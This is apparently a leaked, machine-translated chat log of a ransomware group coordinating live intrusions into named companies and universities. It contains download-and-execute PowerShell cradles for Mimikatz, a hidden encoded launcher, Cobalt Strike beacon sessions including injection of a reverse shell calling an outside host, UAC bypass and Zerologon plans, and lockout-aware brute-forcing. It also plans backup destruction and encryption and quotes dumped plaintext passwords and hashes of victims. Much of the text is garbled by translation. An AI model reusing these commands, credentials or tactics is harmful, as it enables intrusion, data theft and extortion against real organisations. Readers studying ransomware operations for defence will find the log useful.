``)))pay attention yes yes without comparisons you can see and compare the payoffs vote both links iex ((New-Object System.Net.WebClient).DownloadString('https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'));`` iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-ShareFinder.ps1')); ``This is the script from the git https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1 As a consequence in the current session you write Invoke - something you've downloaded and bang it works here's the url of the script command above - just load it into memory without physic drop `` ``. C:\projects\default\temp BBCTX6 @ MAPCIASP\bbbwalkerj EULA.ps1 The term 'EULA.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0058 ``Running scripts by filename? Exactly. No one)`` And who says it's issued once an hour? powershell.exe -nop -w hidden -ep bypass -e ``You said you couldn't load the same load twice so restart the script in the current session for 40 minutes``. iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/')); ``Working when you're ready. powershell.exe -nop -w hidden -ep bypass -e ``1 load 2 times you can't throw the load unique? check the session in tpsh And you can't import it as a module either Good question, I don't know. But you can't use Invoke-Kerberoast.ps1 because ps1 is closed. So if there is no scripting on your machine and there are no modules in ps then how will it work if I import kerberos into ps? this is how tpsh takes the scripts load in itself. Did you try running the scripts closed crystall? any other ideas? did you try to pull this https://wideio.com/USA/6LG8Ean3mNZcWV4Zk4E8A01XYmw2NOfxva5pgZVUWcjnAvyD60q45b991yG0/dashboard @tl1 into tpsh ?
i have access via ps and cmd kxxm I can't believe avg and defender is so evil... even injecting it into a delta process won't work.. Trying different loads, session will go to the armitage and then will fall off. No SafetyKatz, Rubeus or Kerberoast type stuff to load, tears it down right away. Run ps scripts locked. for me textmodify files for themselves net localgroup "Admin" ``. Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator MAPCIASP\Domain Admins The command completed successfully. ``output with /dom``. The request will be processed at a domain controller for domain mapciasp.com. Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator aspprinters bbrooks bkupagnt Domain Admins Enterprise Admins ghouser mkline rmiller sfoster The command completed successfully. ``If I pull files from each conf 10-20 lines I will die in the number of files on the system To be able to search if necessary, and not fuck with the page loading in this chat. Why files about DA EA LA in ad_user 829 Objects go to 1000 users? in #general also wrote how to search history There is no, search for the drive file is not, check and if there your traces - clean up`` `` History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt . ``Do you know that ps stores the history file on the system? On your own dedic yes, it's connected via citrix ts on the rdp?
Target : MS.Outlook:bwalkerjr@birniebus.com:PUT Comment : USERNAME_TARGET_POINTER UserName : bwalkerjr@birniebus.com Password : @@CuAAAiBwdAEGAsBwaAUGAyBgaAIHAABgYAkGAyBgbAkGAlBgYAUHAzBgLAMGAvBQbAA CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM Target : mail.krapfbus.com UserName : bwalkerjr@birniebus.com Password : CredentialType : DomainPassword PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM Target : bwalkerjr@birniebus.com UserName : bwalkerjr@birniebus.com Password : CredentialType : DomainPassword PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM ``Mb external domain birniebus.com where are they? Via cmd and psa how do you work there? Trying to get, seabelt and data on YES I know that @user9 has yes I asked how many with YES networks not up @user3 have you with YES network? I said no doubt about it. I can't tell without a doubt. I have 1 YES real network 1 network. and tell me how many networks we got with YES which without a doubt are normal networks. I'm working faster colleague I'm working 3 more people +++ no more new sessions so all worked out what was it? or not .... bullshit what's it going to be like labavo no login, it looks like there's no freebies there + mostly 7/hrs don't like it i don't @user9 ? no trusts you say ? do make a conf rashash.com - make a confrash plz stateoilcompany.com - strange network 34 users, 66 computers, no trusts can i get stateoilcompany.com ? I'm not sure if I've got a new one, but I've got a new one.com I'm still the only one who works with it?
ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priority yes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work there's a big case can be for two at a time adinfo taken off still get a taxi? well, i did not believe it) `` >mail: tyler@gaudyme.com ``Ah ouch''. >userPrincipalName: destineeg@DressinGaudy.local ``I don't believe it,`` in the adinfo such DressinGaudy.local more +3 sessions and configs too from that domain have 3 cars 2 has a client, but configs on them do not see and they are now dead on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpn apodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnik BK new bots 15pcs do confuber work take whoever.com 10 min brbr newbots are in bk However sexy all off that you can kidajeet still sessions from him on the tachka look for vpn o is bluegracegroup.com adinfo no as not visible domain hurry up)) com `brighthorizons.com` confi please Do spav https://neteric.com not come you'll laugh, but in adinfo no external domain if you pick up then write kobel.com - confi already forgot how to do it? domain vneshn need to give confi TomHolzerFord.local take away kobel.com take away here in the netcob and work here sessions And work with what? mine by the way, flew in, although before did not want to.
they clean daona empty the rest in the shit after closing the grid there are only 2 so far clean not personal took ``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` ``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what? general alg you already know) Okay, but I want the map to reflect the nuances of the situa Da rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without char There are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithm to leave all if it helps you I am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so d to leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a token a little strange you got a ok if offsets av and stuff like that why?
faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovo really here an important aspect of this? so will do zabyla forgot i do not see the division to 100 servers and from 100 chem to change? report as a router will be roadmap, waiting for a router podobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion` please send me your names from here. ``Well, I don't remember the hostname and I can't get into the koba yet.`` now throw the kobu in the history of bicon no unions do not see `` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered.
The command completed successfully. ´you gave the cob above I thought it was she and is to me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping. she and I was interested) in the coba no net or no in the coba?
because I may have it in the one that fell off mapil tekonnect only in myteb no at all TESTCONNECT.lrhc.local or here do not remember exactly, but here like mapil TESTWEB.lrhc.local to check if they are still there I am interested in the host where you mapped from the list i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not koba mapi in question because the vpn fell off and did not have time to check this is it? ``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~ 20-40 minutes per 1tb okay + all understand? yes, understood?
there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments see his circle of users by groups and you see more tróós poznachennyh people in the network, also important to watch and there were interesting files on the computer and among them already found chrome login: root pass: -you then discounted memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your livetime in the network an hour or more just times less you will still noise whether it is a question if you have got + + idea is clear?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you work with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N servers at intervals of 5 
seconds such a remark to us there are more comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list ip, comma separated, and it matches these ircons in a given session this optimizes the time during the mappa armatures result of processing you know and for each server copy line by line ``` execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full ``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this: ``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too elementary things2) the process of our work in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work on the build itself you have 2 hours at most and 
speed up please for what) in the future I will know, thank you alwaysDOMENCHTPS is not specified in the hostsaskask a comrade easier) you have 5 people around what exactly is not configured so ?help him helpcolleague still does not know how to configure a sheet for coba go to the confab+@tl1 all here hello4 min max I just a little bit and all will soon be when? soon all will soon all not yet in place? good morning nets still scanmedr, backups, in centers, etc. all ready? here's what found) `We also copy them to WORM tape daily, with indefinite retention. The tapes are kept in a fireproof safe at the NOC.What tape?only remote-exec returns nothing like remote-exec psexec ADM-NAS ping google.com -n 1 can you check if the remote computer is connected to the internet?he kind of need to order beforehand, I mean the crap that encrypts files)) assemble the dll? what is it, by the way, with the cryptor? + looks for non-domain ports subnets what ports and why? scan portsport servers, scan user subnetsuser7 Well, yes, get a colleague to help and 410 subnets where users sit :flushed:It seems there is a delay - yesterday 60 something servers were pinged, and today over 200. I need to re-sort as usualDo you want to make a new raw? I haven't noticed, I'll do it now if you haven't noticed when you build a .bin file its hash is always differentDo you just give me a new raw what kind of shellcode is it? i can't pull anything from the lab yesterday because i can't pull anything from the test lab because dllvmi is off, psec works, but the session doesn't come specially i'm not pulling, i just jumped from user's car to dk and had to try and find where it'll let me go..and why do you pull? no, just not all can pull, in particular PDK can not you pull all the servers in the coba or what to do with servers that do not come with the session? add me to his computer froze, now reboot ... who in the group to give? 
Domain = cn.net.ntes In adusers mail = mesg.corp.netease.com ``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat Authentication Id : 0 ; 63768393 (00000000:03cd0749) Session : Interactive from 0 User Name : nddevbernst Domain : JDOSSN Logon Server : JDODC64 Logon Time : 10/23/2020 2:15:49 PM SID : S-1-5-21-3450394983-289173729-1299264434-241049 ``in the output mimic or in the ad info? is that where the user went? logon sever in the output mimicwill ask in an hour still in questionnew by how much to expect? old are theresessions working?good afternoonfaeray admin is likely to be the main technician(s) make sense to pull other machines? the current machine (dk) have already searched up and down for files related to FireEye and have already checked all the counter .xml and .txtladno it is the practice of saving on the number of agents in general EDR very often are not installed on workstations, but they are on the serverh Then I saw the assumption was based on the fact that I did not see the process of FireEyeexplain please I do not understand the logic of the assumption based on the examination of users machines? I assumed so, and you say there is no it and look admin on DC and the two servers that I wrote above exactly and it runs in FierEye process called xagt.ehem [+] Determining what EDR products are installed on USHDC1-CSPADS02... [+] host called home, sent: 63 bytes [+] FeKern.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] FireEye Found! ``dalf? 
Is that what it is https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cnaEDR_Query shows on the firewall at that? there are 135 computers and all the servers? no firewall agent either? in the ad_users search: tech, it, network, etc. SharpSniper showed where two of them go, FireEye is not running thereEDR as I understand it is missing, based on: https://www.anti-malware.ru/security/endpoint-detection-and-response FireEye, as I understand it, either knocked out or not usedokjr only win defenders checked - not if in the process on the servers does not hang, so it is oldI guess it is either disabled now, or old and no one removes itFireEye is AV, right? a, the directory is[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vcDBBToC2L6hZJp3) but there is no process, no directory from it, AB can not identify sitbeltwas still installed FireEyesitbelt did not withdrawAB as I understand only win win defenders will be in kobezaberikorocha closed like a shop, this user changed the pass and session hung up, can not get a new rise, changed these guys YES pass?so do not unnecessarily noisydskink throwing tom domain sootv already remove a couple of critical pkv tom domain already work, as you prepare, I will give you a session from 2 domainsvot yes from that domain) ` `. overland.com\dynamics:bobc@t! overland.com\Administrator:Vi3wSon!c overland.com\mahesh.admin:Changeme! 
overland.com\zerto:CR@CKer$ ``To dk from the main working domaina to the domain how to pass) CRCKer$`` Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data: Reply from 10.69.0.35: bytes=32 time=10ms TTL=127 Ping statistics for 10.69.0.35: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms beacon> portscan 10.69.0.35 445 none [*] Tasked beacon to scan ports 445 on 10.69.0.35 [+] host called home, sent: 93285 bytes [+] received output: 10.69.0.35:445 Scanner module is complete ``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center ping goes nowhere, domain is not available may well lie useful dokuoksche pay attention to file servers in IT folders let's write back as you check it outcross-check the files, nothing left thereThere are no browsers on all the machines I think the chance is high enough5 people in a working day can find accesses?There's still no found the creeds from the nasovi then give out a couple of vpn, but there without direct accesses. will have to fuck then let's close the sccy then sccy- on belemor have creeps ?snu.edu deadlockedIt turns out that only sccy and snu.No new sessions will be available today? 
sccy seems to be a couple of sessions alive now checking skytech, there are a couple of sessions there - is there anything alive in `CORP.TELEVISA.COM.MX` ? what to work with today? where are you all already here? it's not like there's a lot of you hello hello ``here somewhere I checked the mail through cme, also no net with the current domain? ``most likely it will separate 1 space without a clue`` good question ``juicy cum`` or ``juicy cum`` will consider it as a password ``if there will be a cum_login will define it as one whole password with spaces`` I put it in quotes in the file simply domain is not better to write in the file I ask about that if there is a space in the password there without a domain in any case ``you`ll
be on LA USERPASS_FILE no File containing users and passwords separated by space, one pair per line ``and the domain is separately specified in the user:pass user pass module that's the way it is)) there's just a space there, is it :CLEARTEXT:? just don't remember if it will or won't understand it? through the file most likely cleartexts yes if you shove them in USERPASS_FILE in smb_login, will it understand quotes in passwords with spaces or will it think that the quotes are part of the password? ``don't polucht only and brutt try the current admins as local there on dki adjacent polzaky not passed if there is no enterprice sucha look for access in the other domain so far datak, here all ready get it? in the name vcertnu then there is probably not. it has what signs? and in the center? a bunch of hypervisors found? then dvcertnu virtualization center or what is it? vcertnu in the center is what? in the center and stuff found?) well, put it out?) yes, also got it) huh... i'll scrap the ports... work your way up the wpn. the locker will get through cb - there's more proactive than auto blocking Checked all available armas everywhere cb Checked all servers with cb maybe they'll find a way to break into the network not sit long first thought he was without it, when i pulled the session saw that he was there found a server without cb?
wait for build user7 then we will close today a, there is still a daughter YES in google with 2ph mail in the softcloud the rest of the passes do not fit, the mail in general has access to the general manager, some operator and an empty mail is given to the mail is info? well not a dump, maybe important files, planes build all the same judging by the name, perhaps there filewash look We found everything but the access to one nasa. there are two disks, one (Mechanic_Library) is not accessible this one is nowhere to be seen in the files / browsers coba in ls nado will be a new coba today no pulls ok, a couple of hortbits and die ``hdavail.com hello everybody hello everybody user4 user8 This one we don't have access to, the others do ``` Shared resources at \10.0.6.83 LS520Dc5f server Share name Type Used as Comment ------------------------------------------------------------------------------- Mechanic_Library Disk Mechanic Library Public Disk The command completed successfully.
On these servers, you have to check the vim console to see if there is a link to the cloud ``` SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS sky-beuza-01.skytech1.local `````` https://10.0.2.32/ui/#/login ESXi' root\$uperm@n `````` Website: https://sky-vcenter65.skytech1.local Username: 'administrator@vsphere.local' Password: 'Superm@n2018' `````` 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas ``If I understood correctly some kind of admin from what `` http://10.0.6.243/web/guest/en/websys/webArch/mainFrame.cgi `````` https://10.0.6.98/login.html PowerEdge T620 http://10.0.6.153/ myshara http://10.0.6.83/rtknas4.40/ nas http://10.0.6.54 is requesting your username and password. The site says: "ReadyNAS Admin". 
``I got it, can you help dumbo come back before 1 o'clock @tl1 help others?
the machine seems to be off all the sessions are off,the last 10-15 minutes of doing nothing with the session is ok,keep working i ran it without and it worked i'm not sure i need it,no it didn't delete? what do i wait for? how do you know it worked? shell rundll32 C:\Users\color764\AppData\Local\Packages\AD2F1837.HPPrinterControl_v10z8vjag6ke6\LocalState\HPPrinterControl_v10.dll, ehnpruPontv #generald how to run and what does it do? ``` beacon> shell net localgroup "Administrators" [*] Tasked beacon to run: net localgroup "Administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator ORANGE_FACT\Desk_Top_Admin ORANGE_FACT\Domain Admins ORANGE_FACT\POSAdmin The command completed successfully. beacon> shell net group "Domain admins" /dom [*] Tasked beacon to run: net group "Domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain vpinc.net. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator avamarbackupuser hpsim itinfo jf jimfu jmb jonb kendallr kr MDJ meraki1 mikedj MSOL_c4e9c8b90962 prtg prtgnew rd scotttaylor siem_agent SQLADMIN SQLSYSTEM Svc_ADSync zscaler The command completed successfully. beacon> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain vpinc.net. 
Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator jb jf jmb kr MDJ mikedj rd scotttaylor Svc_ADSync The command completed successfully. `` https://kali.tools/?p=5342 what for thin clients?'' script runs `` ACUCOBOL-GT Web Thin Client ```` ' Location of file with usernames and human-readable terminal numbers SouthWareUsersFile = "swusers\swusers.txt" ``what's up?
Not sure there's going to be a session again, kidalidll kinli?
here
```
10.1.4.250:80 --alibi
10.1.4.211:443 -- it did not open
10.1.4.211:80
10.1.4.151:80 -- did not open
10.0.0.104:22 (SSH-2.0-dropbear_2018.76)
10.0.0.104:443
10.0.0.104:80 -- 503 Service Not Available
10.0.0.210:80 -- Web Service tab, did not open
```
8 are not pinged, 12 of them are dcpc's that have some sort of exh in ad_ocmp
This is the first time I have heard of lumisco.com, matches, gpjdahocorpin?
You now have 3 grids in operation. Before you leave, report on each: what was done in the current task, what difficulties, what vectors and so on. Started up, yes?
Oh, how well SharpFodhelperBypass works in the test lab on Windows 10 version 1909 with Defender on (https://github.com/FatRodzianko/SharpFodhelperBypass)
sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA==
command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)
This thing works in a test lab on win 10. It opens cmd under admin, but you can't give it arguments, i.e. tell it to run our exe or specify a command. What can be done with it then?
https://github.com/hfiref0x/UACME
https://github.com/L3cr0f/DccwBypassUAC
this is till lunchtime, the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv
On the forum it is, gave the link above.
To finish it is not realistic, I think it's infinite :space_invader:
mindmap finished?
LEADMIN Deere0419!
have a clear.
+your listings separately, where there are no files, you haven't uploaded the listings to the megs?
1.done.overland.com
till tomorrow, good night, tomorrow by 6 noon then we're all there, all those alive are ok? bitches)
there's one full disk encrypted - file dump and 60% c backups + files flagged us and part of the servers (what is the movement, at least 40 min jm us encrypted)
overland servers hell:76 alive:36 closed:36
armies for hell:327 alive:82 closed:82 ants:82
ovrweb servers by hell:10 alive:5 shut down:5
ovrcomm servers by hell:6 alive:3 closed:3
exe started.
```
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 229999 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
```
If possible, it's better to encrypt two disks with backups: 1 with servers, we'll use it, there is one 2tb file; 2 with the extended backups of whines and so on, we'll pull it in and encrypt it.
```
OSCAR-TESTDB.overland.com
RDPAPP1.overland.com
HYPERV-DEV3.overland.com
HYPERVHOSTRMS.overland.com
```
Shouldn't a machine account be displayed as LA?
```
[+] 10.10.20.5:445 - 10.10.20.5:445 - Success: '.\DC$:aad3b435b51404eeaad3b435b51404ee:203d17368b3abd4e470f5adafbc27b5c'
```
And smb_login works fine with this? Although the credentials are fine, I try to run it, but in the lab the machine account doesn't work at all.
```
[-] 10.10.20.5:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
```
Well, it must have been noticed by the regular psexec module, but with an additional option.
```
> use auxiliary/admin/smb/psexec_command
[!] * The module auxiliary/admin/smb/psexec_command is deprecated! *
[!] * This module will be removed on or about 2020-09-16
[!] * Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload
```
It's no longer available in new versions =)
Hmm, that's also an option) forgot about it.
And why not use psexec_command from metasploit?
I have an idea to upload the dll to the balloon on the dk, reset the password from the machine account with a zerologon and use Sharp-SMBExec to run it there. But Sharp-SMBExec doesn't work on the test lab...
```
beacon> execute-assembly /home/user/Desktop/SharpTools/Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[*] Tasked beacon to run .NET program: Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[+] host called home, sent: 172333 bytes
[+] received output:
AdminCheck is false
String is not empty
Connected to DC.testlab.local
Current Stage: NegotiateSMB
Using SMB2
SMB Signing is Enabled
Current Stage: NegotiateSMB2
Current Stage: NTLMSSPNegotiate
Authenticating to DC.testlab.local
Authentication Successful
Login Status: True
Service Name is OGFLSZGUECWHMJMQLQRH
Current Stage TreeConnect
Current Stage CreateRequest
Current Stage RPCBind
Current Stage ReadRequest
Current Stage OpenSCManagerW
Current Stage ReadRequest
Current Stage CheckAccess
Something went wrong with DC.testlab.local
Warning: Service not deleted. Please delete Service "OGFLSZGUECWHMJMQLQRH" manually.
```
https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/
Actually helps to search for PCs assigned to users, namely in the "search for techs" task. You select them from ad_users and use this tool to find their PCs, where there will be valuable information about the network, just information about EDR, backups, etc. Search for keywords like network, admin, tech, etc.
1
This one https://mediaeveryone.com/channel/general?msg=kKPqGtPJd8Kpmd6BC
exe under which you write in treth? There?
https://mediaeveryone.com/channel/general?msg=Xn2ZPrF95sAJ44ecH so isn't it? I asked if you collected sharpshooter and you said yes.
https://github.com/HunnicCyber/SharpSniper
wft?
2
1
lol? dep can you build a case?
No luck trying to get into the likenic.com :thumbsup:
there every time the load increases by about 12 bytes
I will try to get into the previous kobuneasamen, is there mb?
I can't go any farther, I can't go any further, I just restarted and couldn't go any further, then kobalt hung, hung up an empty archive and in bicon the output of adfind and started
I just started the output of adfind from the toolchain
I don't understand, did you start the output of adfind?
com if all the sessions flew away means the domain in the hsa the second coba?
and in general I have worked there with the same domain, if you mean likenic.com I have not tried since yesterday to go there
the second coba there are sessions?
the domain went to the block through citrix, no new ones saved, all the sessions at the same time all the sessions failed
memory protection
`[+] Sophos Found!`
and edr_query? I searched the files - sorhosbelt did not detect it
tell me what edr? it is not laon from the user vicinhos?
I have discounted it for example the host too and you only jump in winlogon?
```
beacon> inject 1108 x64 https
[*] Tasked beacon to inject windows/beacon_https/reverse_https (wikibros.com:443) into 1108 (x64)
[+] host called home, sent: 261139 bytes
[-] could not open process 1108: 5
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (wikibros.com:443) via Service Control Manager (\\127.0.0.1\ADMIN$\05d9cdb.exe)
[+] host called home, sent: 291332 bytes
[-] Could not start service 05d9cdb on .: 5
```
I'm looking at the list balloonnu, yeah where you jumping, you admin?
The session under the system where I took off the hashdump fell off, sagged for an hour, this computer is not pinged now.
Jumping from the first car to different cars and trying to get the system, it does not let me inject to docomputer where the hash was knocked out.
I thought I had a long time ago... so throw it straight to the gennel and it is well configured, has different methods of dumping lsass etc. It's autopwn essentially for when you have a bunch of lsass available, fun thing; spend time once, set it up correctly so that you have the vpc set up for this fuckin' thing right at your fingertips, use this://github.com/Hackndo/Isassto
all you can't get it right, it's a win-server
0% loss
Hosts pinged, I separate up from down, then brutan
these are the ones that fit from here, is the total list got above? then ping and brutservacs gather more
is the edukeyserver OS? is that what we have?
Okay, if not we'll go to all 100 PCs and look for admin hashes or more brute-force accesses and so on.
As a local admin, check this account on the server OS yet.
Well, what do you see? But they don't respond, SMB port 445 can't be seen, and pinged this. 7530 objects returned, not 1k there.
There's a load of 128 out of 1k. Stop, not all of it.
I mean you have admin access to all the PCs covered? It's all Win 10, eh)
Everywhere admin .\Administrator with this hash, to all and sundry computers here: `OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=edu`
Do not fit.
Then change the hash.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 393 bytes
[+] received output:
unfcsd.unf.edu
The domain is correct, by the way? OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
I'm building these now, there's a shitload of them and they're all on the same subnet, and they're also Win 10 Education.
It takes a full hash, not one like that; takes a hash, and what's wrong with it?
OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
There are 4 of them here; only the one I'm sitting on now is alive?)) By PC groups. YES, didn't fit.
Everybody calm down, there will be few attempts if you can't find it all, but take it easy on his hash: 1 attempt at each LA account, already after the check. YES, I will brute force. Yes, we are talking about the check. YES, right now)
LA - a local lockout; the domain policy on LA does not work, lockout as well as login alerts did not cancel the lockout, 5 minutes. The main thing is not to overdo it, there's a threshold on 6 tries, and his hash would have been checked for. YES, I would have checked the server Win from that pool first; he's local admin on more than a dozen PCs for sure.
Check the current local user Administrator. 928 of 1066?) You search for _Testing and find from two groups of PCs:
_Testing,,OU=Computers
_Testing,OU=Frozen,OU=Computers
Certainly there could be such a situation.
OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
OU=_Testing - 4 PCs in the same group: dn:CN=COB-62001,OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
His OU and so on, a group of PCs. Current from hell, comps, live machines in the subnet :thinking: And what did you mean by that?
A lot of machines in the same group where you are now?
The request will be processed at a domain controller for domain unfcsd.unf.edu.
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 366
Minimum password length: 15
Length of password history maintained: 4
Lockout threshold: 6
Lockout duration (minutes): 5
Lockout observation window (minutes): 4
Computer role: BACKUP
The command completed successfully.
Parallel policy, more NP.
Alias name administrators
Comment
Members
-------------------------------------------------------------------------------
Administrator
UNFCSD/CCB Techs
UNFCSD\Domain Admins
UNFCSD\EMPLOYEE
UNFCSD/Student Domain Users
UNFCSD\Workstation Admins
The command completed successfully.
Give me another list of LA. With this machine it is not fatal, 1 check for each DA? That brute is not good, so I do not know how to help. Brute on all the DA of the pass in cmd, 5 hashes, LA administrator. "Do not know how to help")) funny)) The logopass gives hash, check it somewhere)) The logopass?
Well, the LA hash you have, they are local. Do not know how to help. I did it yesterday.
Create in the first hashdump.
CEC-59126, but not here, has access to remote run commands but no admin rights.
COB-62001, here sees system processes.
CEC-59126
